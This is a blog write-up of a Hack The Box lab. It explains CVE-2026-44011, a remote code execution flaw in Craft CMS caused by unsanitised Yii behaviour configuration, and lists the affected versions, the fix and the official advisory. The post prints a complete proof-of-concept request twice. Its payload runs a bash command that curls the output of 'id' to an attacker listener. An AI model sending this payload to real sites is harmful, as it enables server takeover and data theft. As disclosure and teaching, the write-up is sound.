September 30, 2026
CVE-2026–44011 — Remote Code Execution in Craft CMS through malicious attached behaviour.
While solving a lab on Hack The Box I came across CVE-2026–44011. I searched for detailed write-ups but mostly found short advisories, so I…
By Martin Rozariyo I
1 min read
While solving a lab on Hack The Box I came across CVE-2026–44011. I searched for detailed write-ups but mostly found short advisories, so I decided to document my understanding of the vulnerability.
Affected versions
- Craft CMS 4.0.0–4.17.11
- Craft CMS 5.0.0–5.9.17
These were fixed in 4.17.12 and 5.9.18
Any authenticated Control Panel user can exploit this vulnerability. Full administrator access are not required.
Vulnerability overview
An authenticated user can reach a vulnerable code path through the fieldLayouts configuration inside the condition parameter. The critical issue is that this attacker-controlled configuration reaches FieldLayout::createFromConfig() without first passing through Component::cleanseConfig().
This is a continuation of the earlier behaviour-injection issues from GHSA-255j-qw47-wjh5.
Why Yii behaviours matter
Craft CMS is built on Yii framework. Yii has behaviours which allows you to attach additional functionality to a component without modifying the original class.
Yii also provides a powerful dynamic object configuration system that understands special keys such as:
- __class: instantiate this class
- as : to attach a behaviour
- on : to register an event handler
Because of this, Craft normally sanitises the user-controlled configuration with Component::cleanseConfig() before it reaches the object constructor. On our vulnerable path this particular sanitisation step is missing.
Proof-of-concept request
POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; ..._identity=...; CRAFT_CSRF_TOKEN=...
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json
{
"elementType": "craft\\elements\\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\\elements\\conditions\\ElementCondition",
"elementType": "craft\\elements\\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\\Readline\\Hoa\\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl http://your-listener-ip:port/`id`\""
}
]
},
"on *": "self::beforeSave"
}
]
}
}POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; ..._identity=...; CRAFT_CSRF_TOKEN=...
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json
{
"elementType": "craft\\elements\\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\\elements\\conditions\\ElementCondition",
"elementType": "craft\\elements\\Category",
"fieldLayouts": [
{
"as rce": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [
{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\\Readline\\Hoa\\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": "/bin/bash -c \"curl http://your-listener-ip:port/`id`\""
}
]
},
"on *": "self::beforeSave"
}
]
}
}What happens:
- The condition to fieldLayouts data reaches FieldLayout creation without Component::cleanseConfig().
- as rce key attaches an AttributeTypecastBehavior.
- The behaviour is configured such that typecastBeforeSave calls Psy\Readline\Hoa\ConsoleProcessus::execute.
- The wildcard event "on *": "self::beforeSave" forces the typecast method to run in the same request.
- The attacker-controlled command is executed as the web-server user.
Send this request with a valid session cookie and CSRF token.
Exploit code is available here:
https://github.com/khush-613/CVE-2026-44011-poc
Mitigation
Upgrade to Craft CMS 4.17.12, 5.9.18
Official advisory: https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw